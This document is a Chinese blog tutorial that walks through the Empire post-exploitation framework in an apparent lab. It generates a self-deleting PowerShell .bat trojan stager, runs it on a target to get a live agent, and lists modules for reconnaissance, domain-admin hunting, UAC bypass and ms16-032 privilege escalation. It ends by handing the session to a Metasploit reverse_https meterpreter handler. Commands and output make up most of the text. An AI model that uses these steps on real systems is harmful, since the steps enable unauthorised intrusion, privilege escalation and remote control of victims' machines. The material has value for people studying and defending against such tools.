初探Empire

简介:模块分为木马,信息收集,提权,横向渗透以及后门。

环境安装及搭建

git clone https://github.com/EmpireProject/Empire.git
./Empire/setup/install.sh
./Empire/setup/reset.sh
安装完显示如下:

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > 

双击tab功能如下:

(Empire) > 
agents        help          listeners     plugins       report        searchmodule  usemodule
creds         interact      load          preobfuscate  reset         set           usestager
exit          list          plugin        reload        resource      show      

使用listeners模块,并使用其中的http模块

(Empire: listeners) > uselistener http
(Empire: listeners/http) > 
agents     creds      exit       info       listeners  resource   unset
back       execute    help       launcher   main       set    

执行

(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

返回到主页面,即可看到我们有一个listener在运行

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       1 listeners currently active

       0 agents currently active


(Empire) > 

监听弄好了,我们来生成一个木马
查看可生成的木马有哪些

(Empire) > usestager 
multi/bash                osx/macho                 windows/launcher_bat
multi/launcher            osx/macro                 windows/launcher_lnk
multi/macro               osx/pkg                   windows/launcher_sct
multi/pyinstaller         osx/safari_launcher       windows/launcher_vbs
multi/war                 osx/teensy                windows/launcher_xml
osx/applescript           windows/backdoorLnkMacro  windows/macro
osx/application           windows/bunny             windows/macroless_msword
osx/ducky                 windows/csharp_exe        windows/shellcode
osx/dylib                 windows/dll               windows/teensy
osx/jar                   windows/ducky             
osx/launcher              windows/hta       

生成木马

(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http
(Empire: stager/windows/launcher_bat) > info

Name: BAT Launcher

Description:
  Generates a self-deleting .bat launcher for
  Empire.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True        http              Listener to generate stager for.
  OutFile          False       /tmp/launcher.bat File to output .bat launcher to,
                                                 otherwise displayed on the screen.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  ObfuscateCommand False       Token\All\1,Launcher\STDIN++\12467The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  Language         True        powershell        Language of the stager to generate.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Delete           False       True              Switch. Delete .bat after running.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/launcher_bat) > generate

[*] Stager output written out to: /tmp/launcher.bat

将生成的木马放到目标机上执行

攻击机上成功上线

(Empire) > [*] Sending POWERSHELL stager (stage 1) to 192.168.85.157
li[*] New agent 9PK2YXWA checked in
s[+] Initial agent 9PK2YXWA from 192.168.85.157 now active (Slack)
[*] Sending agent (stage 2) to 9PK2YXWA at 192.168.85.157

切换到上线主机

(Empire) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 9PK2YXWA ps 192.168.85.157  WIN-RRI9T9SN85D   *WIN-RRI9T9SN85D\Admini powershell         3908   5/0.0    2019-12-30 02:38:47

(Empire: agents) > interact
[!] Please enter a valid agent name
(Empire: agents) > interact 9PK2YXWA
(Empire: 9PK2YXWA) > 

后正式进去后渗透阶段

收集目标主机有用的信息

  • usemodule situational_awareness/host/winenum
    注:可以查看本机用户,域组成员,最后密码设置时间,剪贴板内容,系统基本系统信息,网络适配器信息,共享信息等等
  • situational_awareness/host/computerdetails
    注:显示目标主机事件日志,应用程序控制策略日志,包括RDP登陆信息,Powershell 脚本运行和保存的信息等等,需要管理权限。

DNS信息获取

  • usemodule situational_awareness/network/reverse_dns
    注:需要设置Range参数,Range设置为你想要扫描的ip网段
  • situational_awareness/host/dnsserver
    注:可以显示当前dns服务器的ip地址

ARP扫描

  • usemodule situational_awareness/network/arpscan
    注:需要设置Range参数,后直接execute执行即可

  • usemodule situational_awareness/network/powerview/user_hunter
    注:可以清除的查看域管登陆过哪些主机
  • (usemodulesituational_awareness/network/powerview/get_domain_controller)获取域的控制器

bypassUAC

  • usemodule privesc/bypassuac
    注:需要设置Listener参数,成功执行后会得到新的shell
  • usemodule privesc/bypassuac_wscript
    注:需要设置Listener,只适用于Windows 7

提权

  • usemodule privesc/ms16-032
    注:自带ms16-032模块,需要设置Listener

查找存在的漏洞

  • usemodule privesc/powerup/allchecks

与MSF联动

empire:
(Empire: agents) > interact V92TNFDK
(Empire: V92TNFDK) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost  192.168.85.159
(Empire: code_execution/invoke_shellcode) > set Lport 192.168.85.159
(Empire: code_execution/invoke_shellcode) > execute

metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.85.159
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

参考链接:
https://www.cnblogs.com/dubh3/p/12046126.html
https://www.anquanke.com/post/id/87333#h2-1

最后修改:2019 年 12 月 30 日 04 : 57 PM
如果觉得我的文章对你有用,请随意赞赏